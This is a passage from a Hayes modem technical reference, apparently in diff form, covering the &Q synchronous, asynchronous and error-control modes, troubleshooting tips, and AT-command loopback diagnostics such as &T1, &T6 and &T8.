a special mode that makes an asynchronous port + appear to operate synchronously after the connection is established. + This mode requires software addressing the Hayes Synchronous Interface + (HSI). + +&Q5 Error-control mode - call establishment and data transfer use an + asynchronous DTE. Negotiation of error-control and compression + features with other modem is controlled by registers S36, S46, and + S48. With factory default settings, modem in &Q5 mode attempts the + most compressed error-free connection features that the other modem + will support. Modem may "fall back" to &Q6 or to &Q0 modes during + the connection negotiation if the remote modem does not support an + error-control protocol. + +&Q6 Asynchronous mode with speed buffering enabled. In addition to the + features provided by &Q0, this mode allows for a DTE speed that is + faster than the modem-to-modem link. Modem buffers and local flow + control are used. + +Note: In addition to the modes selected and initiated with AT commands, some +V-series System Products capable of 9600 bps line speeds (ULTRA(TM) 96, for +example) also support CCITT V.25bis as an alternate method of controlling the +modem. This method of modem control is discussed following the descriptions of +the individual communication modes. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +A.2.1 Asynchronous Mode - &Q0 +In this mode, the modem transmits and receives characters asynchronously to +and from the local data terminal at the same nominal speed as the modem +connection. Asynchronous mode can be selected with the &Q0 command option. + +The asynchronous mode supports both the on-line and the "on-line" command +states. When connected to an asynchronous data terminal, the modem can be +configured, used as a dialer, and placed on-line for data communications. A +complete explanation of communications in this mode is provided in both the +Smartmodem Product User's Reference and the V-series System Product User's +Reference. + +If the modem receives a character while dialing the telephone number, it +aborts the call and sends the OK result code; if a character is received after +dialing but prior to the completion of the connection, it aborts the call and +sends the NO CARRIER result code. + +The modem exits the on-line state and returns to the command state when a loss +of carrier exceeding the time interval stored in S10 is detected. For the +responses associated with transitions of the DTR signal for this mode, refer +to the discussions of the &D command in Chapter One. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +A.2.2 Synchronous Mode 1: sync/async - &Q1 +Synchronous mode 1 is intended to support terminals capable of communicating +both synchronously and asynchronously over the same V.24/EIA 232-D port. In +synchronous mode 1, a call may be completed using asynchronous methods from +the command state with the D or A command. The modem automatically switches to +the synchronous on-line state when the CONNECT XXXXX result code is delivered +to the terminal. Because call establishment in this mode is initiated from the +asynchronous command state, the modem must be attached to a computer port with +both synchronous and asynchronous capabilities. + +If the modem receives a character while dialing the telephone number, it +aborts the call and sends the OK result code; if a character is received after +dialing but prior to the completion of the connection, it aborts the call and +sends the NO CARRIER result code. + +The data terminal must apply an ON condition to DTR before on-line data +transfer can begin. Once the CONNECT XXXXX result code is received, the modem +delays a period of time determined by S25 before examining the condition of +the DTR signal. If DTR is ON, the modem enters the synchronous on-line state. +If DTR is OFF, the modem hangs up and returns to the asynchronous command +state. For the responses associated with transitions of the DTR signal for +this mode, refer to the discussions of the &D command in Chapter One. + +The modem exits the synchronous on-line state and returns to the asynchronous +command state when a loss of carrier exceeding the time interval stored in S10 +is detected. + +If DTR is OFF and &D2 is selected, the auto-answer feature is disabled +regardless of the value of register S0. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +A.2.3 Synchronous Mode 2: stored number dial - &Q2 +In this mode, the modem supports a synchronous-only data terminal or a +computer with a synchronous adapter card. In synchronous mode 2, the modem +automatically dials a number stored in location 0 (see the &Zn=x command) when +the modem detects an off-to-on transition on DTR (when it is turned on). When +configuring the modem for this mode, result codes should usually be turned off +(the Q1 command option) as some computers do not interpret responses from the +modem correctly. The modem can be configured in the asynchronous command state +while &Q2 is in effect, but the D and A commands are disabled. + +The modem exits the synchronous on-line state and returns to the asynchronous +command state when a loss of carrier exceeding the time interval stored in S10 +is detected. An on-to-off transition of DTR causes the modem to hang up and +return to the asynchronous command state. For the responses associated with +transitions of the DTR signal for this mode, refer to the discussions of the +&D command in Chapter One. + +Synchronous mode 2 is similar to the CCITT Recommendation V.25bis ("Direct +call and/or answer controlled by the DTE"). + +Once this mode has been selected, the modem may go off-hook and begin dialing +the stored number as soon as the modem is connected to the terminal. To delay +this transition, turn the modem off (place the power switch in the down +position) before connecting the devices. When the connection is completed, +turn the modem back on. Note that when DTR is off, auto-answer is disabled - +regardless of the &D option selected. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +A.2.4 Synchronous Mode 3: manual dial with data/talk switch - &Q3 +In synchronous mode 3, the DTR interchange circuit serves as a data/talk +switch. This mode supports a synchronous-only data terminal or a personal +computer with a synchronous adapter card installed. A telephone set must be +attached to the PHONE connector on the rear of the modem or directly to the +telephone line. This mode permits the data terminal operator to initiate a +call using the telephone with the modem in "talk mode," and to complete the +call by switching the modem to the "data mode" by turning on the DTR +interchange circuit. When configuring the modem for this mode, result codes +should be turned off using the Q1 command option. The modem can be configured +in the asynchronous command state while &Q3 is in effect, but the D and A +commands are disabled. + +To originate a call in synchronous mode 3, the DTR interchange circuit must be +off. This places the modem in talk mode. When the modem has been configured +for this mode with the &Q3 command, the terminal operator can lift the +receiver and dial the number. When the last character of the dial string has +been dialed, the modem can be switched to data mode by causing the data +terminal equipment to turn on the DTR signal. The operator should then hang up +the receiver. When the data terminal equipment turns on DTR, the TR indicator +(on the front panel of external Smartmodem and V-series System Products) +lights up. For the responses associated with transitions of the DTR signal for +this mode, refer to the discussions of the &D command in Chapter One. + +The modem exits the synchronous on-line state and returns to the asynchronous +command state when a loss of carrier exceeding the time interval stored in S10 +is detected. + +If the connection fails, the modem automatically hangs up and switches from +data to talk mode. To re-initiate the call, DTR must again be turned off. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +A.2.5 Synchronous Mode 4: Hayes AutoSync - &Q4 +With communication software incorporating the Hayes Synchronous Interface +(HSI), the modem can communicate synchronously without a synchronous interface +adapter card. In AutoSync mode, the modem places the call asynchronously then +automatically switches to synchronous operation once the telephone connection +is fully established. + +If the modem receives a character while dialing the telephone number, the +modem aborts the call and sends the OK result code; if a character is received +after dialing but prior to the completion of the connection, it aborts the +call and sends the NO CARRIER result code. + +The data terminal must apply an ON condition to DTR before data transfer can +begin. Once the CONNECT XXXXX result code is received by the DTE, the modem +delays for a period of time determined by S25 before examining the condition +of the DTR signal. If DTR is ON, the modem enters the synchronous operation +state. If DTR is OFF, the modem hangs up and returns to the asynchronous +command state. + +The modem exits the synchronous on-line state and returns to the asynchronous +command state when a loss of carrier exceeding the time interval stored in S10 +is detected. For the responses associated with transitions of the DTR signal +for this mode, refer to the discussions of the &D command in Chapter One. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +A.2.6 Error-Control Mode - &Q5 +The error-control mode is a feature available only between Hayes V-series +System Products, and other modems supporting particular protocols (e.g., CCITT +V.42). This mode provides a means of controlling errors that may occur during +transmission. When operating in this mode, the modem implements one of the +error-control protocols that can be negotiated with the remote modem. + +If the modem receives a character while dialing the telephone number, it +aborts the call and sends the OK result code; if a character is received after +dialing but prior to the completion of the connection, it aborts the call and +sends the NO CARRIER result code. For the responses associated with +transitions of the DTR signal for this mode, refer to the discussions of the +&D command in Chapter One. + +Error-control mode is automatically selected in &Q5 communication mode +(factory setting) for V-series System Products. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +A.2.7 Asynchronous Mode with Automatic Speed Buffering - &Q6 +Automatic Speed Buffering (ASB) is useful for computers and communication +programs that do not automatically adjust to changing transmission speeds. ASB +enables computer equipment to send and receive data to and from the attached +modem at one particular transmission speed, regardless of the speed of the +modem-to-modem connection. (If using a Hayes Smartcom Product, ASB is +unnecessary; Hayes communications software adjusts to changing speeds and +connection types.) + +When a V-series System Product cannot complete an eror-control connection, it +attempts to establish an asynchronous connection (if in factory +configuration). When this occurs, the modem-to-computer (DTE) transmission +speed may change, however. To accommodate computers or computers running +software that cannot adjust to such a change, the local V-series System +Product can be configured to enable Automatic Speed Buffering when it has to +fall back to asynchronous communication. For negotiation failure treatments, +see the description of S36 in Chapter One, and the modem's Installation Guide +for the options available to the specific modem. + +ASB buffers (stores) data temporarily, using local flow-control to parcel it +from the computer as the modem is ready to receive it. The modem must be set +with the &K command to use the appropriate DTE flow-control method. When using +ASB, the modem signals the local computer when to start and stop sending data, +depending on how full the modem's 256-byte buffer is. The factory setting for +flow-control is appropriate for most computers. However, in rare instances, +you may need to select another flow-control method. For example, if using +XON/XOFF flow control (&K4 setting) results in undesirable interactions with +the user's application software, then RTS/CTS (&K3) or transparentized +XON/XOFF (&K5) are available. + +To increase buffer size, change its "upper limit" by changing the setting of +S50 from its factory setting of 16 bytes to a higher number in its range of 2- +250 bytes. The value of the register reflects the number of bytes that can be +stored in the buffer before the modem signals the computer to stop sending +data. It is unlikely that the buffer's "lower limit," the level at which the +modem signals the local computer to resume sending data, would ever need to be +changed. However, this setting can be changed by writing to S49. The factory +setting is 8 bytes with a range of 1-249 bytes. If these register values are +set incorrectly or outside the acceptable range, they are automatically +adjusted by the modem for ASB to work. + +If the modem receives a character while dialing the telephone number, it +aborts the call and sends the OK result code; if a character is received after +dialing but prior to the completion of the connection, it aborts the call and +sends the NO CARRIER result code. + +For the responses associated with transitions of the DTR signal for this mode, +refer to the discussions of the &D command in Chapter One. + + +============================================================================== +Appendix B: +Troubleshooting Tips + +This appendix offers suggestions for remedying problems in modem +communications. The first sections discuss setup and configuration issues. The +last sections describe the tests that can be run using AT commands. + +When problems first occur, the natural response is to question the operation +of the modem on one end or the other. However, as well as the modem, problems +might involve cabling (where appropriate), the computer, the communications +software, and the telephone lines. All of these components are potential +problem areas that should be considered before assuming the difficulty lies +with the modem. + +The first section of the appendix covers the following topics: + +* Problems in Getting Started - the computer cannot communicate with the +modem, or the connection is inconsistent or otherwise substandard + +* Problems in Establishing Communications - DTE can communicate with the +modem, but cannot make the connection with the remote system + +* Problems Encountered while On-line - high error rate, dropped connections, +scrambled data, and locked systems are among the difficulties that may be +experienced + +The discussions on these areas will help in setting up and maintaining +communications. In addition, the test procedures outlined in this section are +useful in determining the source of a problem with modem use. + +The second part of the appendix describes testing that can be performed using +AT commands. + + +***************************************************************************** +B.1 The Communication Link +Because there is more to the connection than the modem, all of the components +should be verified. The diagram below depicts the components in a +communication link with two computers, two modems, and a dial-up telephone +circuit. The installation may include a dedicated leased line rather than a +switched central-office connection, or a mainframe host with an asynchronous +or synchronous front-end processor at one end or the other. The general +principles, however, are the same. + +The configuration above is the context of modem use in which the communication +link is discussed in this section. Although your modem may be an internal one, +that is, installed inside the computer, the operational concepts are still the +same. + +The suggestions provided in the user documentation accompanying each Hayes +modem will clear up the majority of problems in an installation. Most +difficulties arise from simple causes - improper or loose connections or +software incompatibility. Be sure to review the scenarios and tips before +assuming the problem is something more. The suggestions in this section +require some familiarity with the AT Command Set, DTE requirements, EIA 232- +D/CCITT V.24 signals, and the telephone system. + +A communication link problem may simply be due to a bad switchboard +connection. Before calling the local telephone system, however, you should +make sure the problem is not being caused by faulty or improperly connected +equipment at either end. Telephone service can be very expensive, especially +if the problem is not really with the phone lines. + + +***************************************************************************** +B.2 Troubleshooting the Process +Troubleshooting the communications is best handled by analyzing the entire +process. The failure is typically in only one area. This section looks at the +causes and solutions to problems in the three main areas: getting started with +the modem, making the connection, and the on-line connection. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +B.2.1 Problems in Getting Started +If a newly-installed modem does not work properly, here some likely causes: + +* Improper physical connection (data cables not plugged in, etc.) + +* Power supply not plugged into receptacle and modem therefore not powered up + +* Parameters set for the DTE or software preventing communication between the + DTE and modem + +It is uncommon for the modem itself to fail, although this does occur. +Checking modem operation is fairly simple when the modem is an external +device. Generally, if the modem failed its self tests on powerup, the front +panel lights will indicate a problem. For example, if the MR (modem ready) +light does not come on, the modem may have a problem. Or if the HS light +(external Smartmodem and V-series System Products) does not come on, the modem +may be improperly configured. + +Some cases of apparent modem failure may be caused by a power surge; changed +parameters in your software that prevent it from finding the modem; an +incompatible component in the communication link; an improper connection; or +simply a device that is not plugged in or turned on. Before initiating the +V.54 tests described in this chapter, re-examine the communications equipment +to make sure none of the above conditions could be causing the difficulty. + +............................................................................ +B.2.1.1 Verifying the DTE-to-Modem Connection +The first interface to verify is the one between the DTE and the modem. This +involves the cable, the modem, the software, and the DTE. + +Cable Requirements +When a cable is used to carry signals between the DTE and the modem (external +modem) any cable with transmit, receive, and ground will support standard +asynchronous communications. To make sure that communications are performed +properly, all other transmission modes require additional signals. For +example, synchronous communication requires timing signals. Error-control +communication with hardware local flow control requires RTS and CTS signals. +For pinouts and descriptions of these signals, see the end of this chapter. To +determine the signal capabilities of a cable, you can issue the &T19 command +(supported only by V-series System Products). The &T19 command is discussed +later in this section. + +Another cabling factor that can influence communications is shielding. If any +of the cables that are connected to the DTE (not just the one connecting the +modem to the computer) is not shielded, interference can occur that may result +in data errors. In all cases, the connector and the cable wires themselves +should be shielded to reduce the possibility of interference. + +DTE Port or Slot +Although it may seem obvious, not every computer has a serial port (the kind +necessary for modem communications). Also, that port may already be taken up +by a printer. Some computers support a parallel printer, instead. If the modem +is an internal modem, and it has been installed correctly, this should not be +a problem. However, selection of the port is important, no matter whether it +is an internal or external modem. In fact, improper port selection is one of +the most frequently diagnosed problems discovered by Hayes Customer Service. + +Modem's Command Processor and the Software +The process below may be useful for troubleshooting an unfamiliar +modem/software combination. This could be either for a new program or the +addition of a new modem to an existing installation. The process is oriented +toward asynchronous operation. However, if troubleshooting a synchronous +connection, you will need to verify the asynchronous portion of the modem's +operation anyway. The steps below help verify that command information is +getting from the DTE to the modem and that its command processor is operating +properly. + +Process: If using communications software (and not a terminal), consult its +user's guide for suggestions and the proper procedure for issuing command +interface with the modem. It is essential that you be able to establish a +direct connection between the DTE and the modem, so that what you type is +transmitted through the computer directly to the modem. + +Step 1: Try issuing AT. The OK result code should be returned by the +modem. The modem should be receiving your commands and be responding with a +result code. If commands don't seem to be reaching the modem, check the cable +connection. Make sure you are addressing the desired communication port (COM1 +or COM2). This option is set either with a software option or with an +operating system command. For example, the Chooser is used to select the COM +port for the Macintosh. The DOS SET command is used for IBM PCs and +compatibles. The physical connection of the modem to a terminal determines the +port. + +Step 2: If you can't see anything you type, or if for any other reason, you +suspect that the modem's settings may be preventing the connection, issue +AT&F to restore the modem's factory configuration. If the modem is a V- +series System Product, try issuing AT&Q0 to put it into normal +asynchronous mode. In this mode, any software should talk to the modem. For +example, local flow control will not be an issue if it is configured for +standard asynchronous mode. + +Step 3: Try issuing commands to the modem. For example, try the I commands +used to identify the modem. If OK or the expected results (see the I command +descriptions in Chapter Five) are returned, the modem is operating as it +should. Try changing a few configuration settings, then resetting the modem +with ATZ. If OK is returned, this part of the modem's command processor is +functioning properly. If no responses are returned from the modem, try issuing +ATE1 to enable command state echo. If characters are double, issue +ATE0 to disable command state echo, as the software is providing that echo +already. Then try issuing some commands or reading some S-Registers. + +Analysis: If using different communications software before running this +procedure, either that software is not compatible with the modem, or an +incorrect setting (e.g., communication port) that prevented the connection was +corrected with the software used to make the direct connection. This setting +should be changed in the original software. + +If the connection were made with the same software that previously exhibited a +problem, but no problem occurred when in direct connect mode, check the +settings used in the command-oriented process above to make sure that the +standard software interface (probably menu-driven) is storing settings such as +COM port selection, speed, and character format. This may all seem too +rudimentary, but a simple conflict of modem and software settings typically +causes the problem. + +If the process works in asynchronous mode, but does not in error-control or +ASB mode, you may have cabling and/or local flow control problems. + +............................................................................ +B.2.1.2 Checking the Dialer and the Telephone Lines +Once you are certain that the modem is receiving and responding to commands +from the DTE, you can verify the modem's dialing capabilities by attempting a +call. This will also test the telephone lines. + +Process: As described in the previous section, check your communications +software for the procedure to issue commands directly to the modem. The steps +below explain how to place a call using the D command and various dialing +modifiers. + +Step 1: If you receive an OK result code, instruct the modem to dial an actual +telephone number (using the D command). If calling out of a PBX, remember to +include the 9 or other outside access code in the phone number. Listen for a +dial tone, followed by the tone dialing beeps. When these occur, they ensure +you've entered the phone number correctly, and the local phone line is +responding properly. If there is no dial tone, check the phone line by dialing +with an ordinary phone. Note that some PBX systems must be modified to produce +at least 48 volts DC for the modem to work. + +Step 2: If you hear the phone on the other end ringing, then the remote phone +is responding properly. Press any key to hang up. + +Step 3: Try dialing another modem to see if you make a connection. A +connection is indicated by two whistling sounds of different tones (the +carriers), followed by a hissing sound. The modem should respond with a +CONNECT XXXXX result code. + +Analysis: When you have reached this point successfully, both modems are +performing correctly. If no errors occurred with these steps, the problem is +related to software, user error, or improper modem installation/setup. If this +procedure indicated a problem with the modems or the communication link, go on +to the next section. A common setting that might need to be changed is the +software's or modem's response to the DTR signal (controlled by &D options). + +You can check the modem's answer capabilities (or when serving as the remote +modem in the process above) by issuing the A command when the phone rings. The +incoming call must be from a modem, however, not a voice call. The same +sequence of carrier exchange will be made. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +B.2.2 Problems Encountered During Communications +Another set of problems can follow establishment of a data connection. These +may range from loss of carrier to data loss. The sections below discuss these +situations. + +............................................................................ +B.2.2.1 Data Loss or Corruption +A typical complaint regarding connections is that of lost or corrupted data. A +number of factors can affect the transmission of data. + +Modem Settings +"Garbled," or otherwise faulty data can occur from the time the connection is +made or just a momentary problem. If all the data that comes across is +incorrect, or if the modems handshake with each other successfully but not +data can be transferred, suspect an error in the setting of some +communications parameter. For example, both systems must use the same +asynchronous character format or synchronous framing and clocking scheme. Even +if the local system is operating properly, if the remote system uses a +different format, the garbled data may be exactly what is sent and not the +result of any modem or transmission error. + +Line Noise +Occasional garbling or loss may be the result of noise or otherwise poor +quality of the telephone line. If a dial-up connection is too noisy, the +connection should be broken, and the connection re-attempted; you get a +different circuit each time. One that is acceptable for voice may not be for +data. With a leased line, the circuit is always the same. If you experience +line noise or line drops, you should contact (or the software should recommend +that the user contact) the vendor of the leased line. + +Transmit and Receive Levels +Other factors that affect both leased and dial-up lines are the transmit and +receive levels. These settings determine the signal levels used by the modem +in each direction. Some Hayes modems permit these levels to be adjusted. The +range and availability of these adjustments is in large part controlled by the +local telephone system. For example, the recommended settings and ranges are +different for modems sold in the U.K. than for those sold in the U.S. See the +documentation accompanying the modem to determine whether this capability is +supported. + +DTE Processor Restrictions +Some multi-tasking operating systems can occasionally lose small amounts of +data if the computer is heavily loaded and cannot allocate processing time to +the communications task frequently enough. In this case, the data is corrupted +by the DTE itself. This could also cause incomplete data transmission to the +remote system. DTE processor capabilities should be a concern when developing +software for data communications when the line speed is greater than 9600 bps +and the modem-to-DTE connection is 19200 bps or higher (for example, when data +compression is used). The modem will provide exact transmission of the data it +receives, but if the DTE cannot "keep up" with the modem because of other +tasks or speed restrictions, precautions should be taken when writing software +or when adding modems with extra high speed capabilities into a link. + +One way to avoid the problem of data loss caused by the DTE is the use of an +upgraded serial port such as Hayes Enhanced Serial Port(TM) (ESP(TM)) card. +This card replaces the existing serial card, providing two ports, data +buffering, and a communications co-processor to take some of the load off of +the DTE processor. For information regarding this product line, contact Hayes +Customer Service. + +Buffer Overflow +Hayes V-series System Products provide a data buffer for overflow when the +modem is transmitting data to the DTE faster than it can process it, or vice +versa. The upper and lower limits of the buffer can be adjusted with S- +Registers 49 and 50, although the factory settings suit most situations. + +............................................................................ +B.2.2.2 Dropped or Lost Connections +Phone line quality or features such as call waiting can cause lost +connections. As described above, if the connection keeps dropping, you might +want to contact the telephone company. However, you may first want to try a +connection with another remote system and/or try using the modem from a +different phone connection altogether. In addition to phone line problems, two +other things might cause loss of connection. + +Call Waiting +The call waiting feature available on some dial-up lines momentarily +interrupts a call, causing a click, to inform voice call users that another +call is coming through. This process effectively interrupts the carrier signal +and may cause some modems to drop the connection. + +One way around this is to set S10 to a higher value so the modem tolerates a +fairly long loss of carrier signal. Data loss may still occur, but the +connection will not drop. Of course, the remote modem must be similarly +configured. When originating the call, a special prefix can be issued as part +of the dialing string to disable call waiting for the duration of the call. +The exact procedure varies from area to area; contact the local telephone +system for details. + +Automatic Timeout +Some Hayes modems offer an automatic timeout feature, to prevent an inactive +connection from being maintained. This inactivity delay can be set or disabled +with S30. This "watchdog" feature prevents occurrences such as undesired long +distance charges for a connection that was unintentionally maintained. + +System Lock up +There are situations in which systems do lock up, but in many cases it is +simply that one or the other of the DTEs has been "flowed off," that is, the +character that stops data transfer has been inadvertently sent. This can +happen during error-control connections if the wrong kind of local flow +control has been selected. For an explanation of local flow control options, +see the &K command definition in Chapter One. In addition, the problem could +be the result of incompatible EIA 232-D/CCITT V.24 signaling. The section +below provides some situations and tips that will help if the communication +link seems to lock up. + + +***************************************************************************** +B.3 Special Environment Considerations +The charts below provide some hints for custom setups to remedy problems for +DTE and telephone line peculiarities. Because Hayes modems can be configured +to suit almost any combination of components in a communication link, you can +adjust to compensate for limitations in almost any computer or telephone +system (within the limits imposed by the local telephone authorities). + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +B.3.1 Custom Modem Setup for Mainframe or Minicomputer Host +Check the following host symptom/limitation situations for a solution +involving modem re-configuration. + +Host Limitation Hayes Solution +----------------------------------------------------------------------------- +Can't control DTR or issue Select &D0 : Modem ignores changes in +escape sequence DTR status (factory setting) + +Can reset itself but not the modem Select &D1 : Modem enters command state + when on-to-off transition of DTR is + detected. + +DTR timing is not adjustable Adjust register S25 delay time + +Unable to monitor carrier Select &S1: Handshake asserted prior to +(older IBM Hosts) handshake negotiation + +Must see DSR at all times Select &S0: DSR always asserted +(VAX systems) + +Timing will not support lengthy Select &S2: DSR asserted after handshake +handshakes (re-associated with negotiation, but before CONNECT result +some high-speed modems) code is sent to DTE. Also select a + specific negotiation handshake option + (N command option.) which specifically + matches the modem combinations. + +Must see CTS to be able to Select &R: ignore RTS; always assume +talk to modem presence of CTS. + +RTS/CTS timing not adjustable Adjust S26 RTS-to-CTS delay time + +Not able to recognize FDX modem on Adjust S26 RTS-to-CTS delay time +2-wire telephone line + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +B.3.2 Custom Modem Setup for Telephone System Requirements +Check the following telephone system symptom/limitation situations for a +solution involving modem re-configuration. + +Telephone System Limitation or Problem Hayes Solution +----------------------------------------------------------------------------- +Noise on telephone line causes modem to Increase S9 setting: Carrier +falsely detect carrier on line Recovery Time + +Modem connection broken due to noise spikes Increase S10 setting: Lost +on the telephone line Carrier-to-Hang-UP Delay + +Security problems with incoming calls Decrease S10 setting; if S10 +connecting onto prior host sessions - is set to 255, the modem will +indicating that host can't reset soon enough not hang up when carrier is + lost. + +System needs to be able to originate calls Issue the R command within a +in answer mode for call-back security dial string (Reverse mode) + +Telephone system is too slow to be able to Increase register S11 setting: + respond to auto-dial DTMF (tone dialing) Tone dialing speed +pulses + +Business telephones (multi-line key systems) Check setting of &J command; +exhibit false "busy" light indications use the &J1 setting with RJ-12 + and RJ13 type phone jacks. + +System must be able to call past After accessing the PBX, issue +unattended operator positions the following dialing command + modifiers: !(*;#) + + +***************************************************************************** +B.4 Using AT Commands to Test Modem Circuits +In addition to the powerup tests the modem performs, you can also use AT +commands to check the modem's functions. This section describes the tests that +can be performed, provides a procedure for each test, and the explains the +results that can be expected. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +B.4.1 Available Tests +As part of the modem's operation, it can be placed in several loopback +conditions. These conditions are primarily for the purpose of testing the +digital and analog capabilities of the modem by simulating the activities +performed by these functions during the communication process. + +These loopback patterns can serve as diagnostics to help in determining +whether the source of a communication problem is a local modem, a remote +modem, or connections in between. Although these tests are oriented toward +problems in a new installation, they are also useful if a previously working +modem suddenly fails. Refer to the troubleshooting information provided in the +documentation accompanying the modem(s) for suggestions on remedying a +communications problem. + +Failures in a point-to-point communication link, usually characterized by +unacceptably high error rates or total inability to communicate, may be the +fault of either the local or remote computer, the local or remote modem, or +the telephone company circuit. The modem's diagnostic and test facilities +enable you to determine the source of the problem: + +* Local Analog Loopback: Tests the path that includes the local modem and +local computer + +* Local Analog Loopback with Self Test: Checks the operation of the local +modem with an internally generated test pattern + +* Remote Digital Loopback: Verifies the path that includes the local +computer, local modem, remote modem, and telephone circuit + +* Remote Digital Loopback with Self Test: Tests the path that includes the +local modem, remote modem, and telephone circuit with an internally generated +test pattern. This test requires a CCITT compatible modem. + +* Local Digital Loopback: Tests the communication link, the local modem, and +the remote modem (permits a non-CCITT compatible, remote modem to engage in a +digital loopback test with the local modem) + +All digital loopback tests must be performed while the modem is configured for +asynchronous operation. Before beginning, place the modem in the asynchronous +mode with the &Q0 command. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +B.4.2.Performing a Test +Tests are performed by issuing AT commands to the modem. Some tests require a +connection be established. Others, like the internal memory diagnostics and +analogue loopback tests, check the local modem only and therefore do not +require a link with a remote modem. The procedures below explain how to +initiate and terminate tests. + +............................................................................ +B.4.2.1.Initiating a Test +All of the diagnostic tests must be initiated from the asynchronous command +state (&Q0). To use the loopback tests: + +* establish a connection (except when running Analog Loopback L3 test)), and +return to the command state by issuing the escape sequence (+++), or if the +&D1 DTR option is selected, by generating an on-to-off transition on DTR + +* issue the appropriate &T command once in the command state. + +These tests are performed from the asynchronous command state. The results of +these tests may be will help check out the modem's function and the quality of +the communications link. + +............................................................................ +B.4.2.2 Terminating a Test in Progress - &T0 +A test may be terminated from the command state at any time by issuing the &T0 +command to the modem. If the local analogue loopback or remote digital +loopback tests are being performed, it is necessary to issue the escape +sequence to return to the command state before sending the &T0 command. +Commands that follow &T0 in a command line are ignored. + +Entering the H0 command will terminate a test, leaving the value of S18 at its +current value; resetting with the Z command terminates the test, resetting the +value of S18 to 0. A soft reset with the Z command re-configures the modem +with the selected user profile. Both techniques break the connection. + +............................................................................ +B.4.2.3 Setting the Test Timer - S18= +The test timer determines the duration of a test. S18, when set to a non-zero +value, establishes the duration of the modem's diagnostic tests. When a test +has been active for a period equal to the value chosen for this register (from +1 to 255 seconds), the modem will automatically stop the test and return to +the command state. + +For example, if the register is set to 10 (ATS18=10), a test, when +initiated, will continue for 10 seconds. Setting S18 to zero (ATS18=0) +disables the test timer (factory setting). Tests are then terminated with the +&T0 command or by resetting the modem. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +B.4.3.Testing with Analog Loopback +Use the analog loopback tests if you suspect the modem is causing errors in +data transmission. The local analog loopback test will verify both the local +modem and the local data terminal equipment. If this test fails, the data +terminal equipment rather than the modem may be at fault. The local analog +loopback with self test will verify the integrity of the local modem only. If +this test fails, the local modem is at fault. If the modem passes both of +these tests, attempt the remote digital loopback with self test to verify the +modem-to-modem communication path. + +............................................................................ +B.4.3.1.Local Analog Loopback L3 - &T1 +Use the analog loopback test if you suspect the modem is causing errors in +data transmission. The local analog loopback test will verify both the modem +and the local computer. If the local analog loopback test fails, the local +computer may be at fault. + +Note: This test may be performed with a V.21, V.22, V.22bis, or V.23 +connection. + +Set the local computer to echo characters and the local modem to echo commands +received from the local computer (the E1 option selected). Initiate the test +with &T1. Type a few sentences; they will be looped back to the local +computer. + +If the modem echoes your keyboard input to the screen as you typed it, the +modem is operating correctly. If not, the modem may be faulty. To end the +test, enter the command state (+++) and issue the &T0 command. + +............................................................................ +B.4.3.2 Local Analog Loopback with Self Test - &T8 +This test is used to verify the integrity of the local modem's transmit and +receive circuits. During this test, an internally generated test pattern is +transmitted from the modem, looped back into the receiver circuit, and +compared with the original pattern for any errors. + +Note: This test may be performed with a V.22 or V.22bis connection (&Q0 and B0 +selected). + +Set the computer to echo characters and the local modem to echo commands +received from the computer (the E1 command selected). Initiate the test with +&T8. When the test is terminated, with the &T0 command, the modem will return +a three-digit test result (e.g., 000=no errors, 012=12 errors). If the error +count reported is 000, the local modem passed the test. An error count of 255 +indicates that 255 or more errors were detected. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +B.4.4 Testing with Digital Loopback +Local digital loopback and remote digital loopback together test all of the +components in the communication link, including the modems. Data sent from one +modem is looped back to it by the other modem without going through the other +modem's computer. Local digital loopback tests the communication link from the +remote modem; remote digital loopback tests the communication link from the +local modem. + +When local and remote digital loopback indicate a modem problem rather than a +communication link problem, both parties should run local analogue loopback to +test the modems. If both modems test good but problems persist, disconnect and +place another call. If the problem still exists, the phone line or another +component in the communication link is faulty. + +............................................................................ +B.4.4.1 Remote Digital Loopback L2 - &T6 +Remote digital loopback verifies the operation of both modems, the local +computer, and the telephone circuit, by commanding the remote modem to loop +data sent to the remote system back to the local modem. + +Note: This test may be performed with a V.22 or V.22bis connection and &Q0 +mode selected. + +Before initiating remote digital loopback, establish a connection with a +remote modem. Then, enter the command state and issue the &T6 command to begin +the test. + +Type a few sentences; they will be looped back to the local computer without +appearing on the remote screen. If the modem echoes your keyboard input to the +screen as you typed it, the modem is operating correctly. If the received data +does not match what you typed, one of the modems or the local communication +link is not functioning properly. To end the test, enter the command state and +issue the &T0 command. + +Note: The local modem requests a digital loopback with the remote modem +through a special CCITT standard handshake sequence. The remote modem +automatically acknowledges the request if it has been conditioned to do so +with the &T4 command. (See the discussions on the &T4 and &T5 commands.) If +the remote modem is not Hayes-compatible, it may not permit this test to be +executed from the local modem (response will be ERROR). However, if the remote +user can put the modem into local digital loopback or an equivalent state, the +test can be performed from the local modem. + +............................................................................ +B.4.4.2 Remote Digital Loopback with Self Test - &T7 +This test verifies operation of the local modem, the remote modem, and the +telephone circuit. The local modem sends a self test pattern to the remote +station. The remote modem, when configured to grant remote digital loopback +(with &T4), loops its receive data stream back to the local system. The local +modem examines the receive pattern and increments an internal error counter +each time an error is detected. + +Note: This test may be performed with a V.22 or V.22bis connection and &Q0 +mode selected. + +Before beginning the test, establish a connection with a remote modem. Then, +enter the command state and initiate the remote digital loopback by issuing +&T7. When the test is terminated with the &T0 command, the modem will return a +three-digit test result (e.g., 000=no errors; 012=12 errors). If the error +count reported is 000, the local and remote modems and the telephone circuit +passed the test. If errors were encountered, initiating 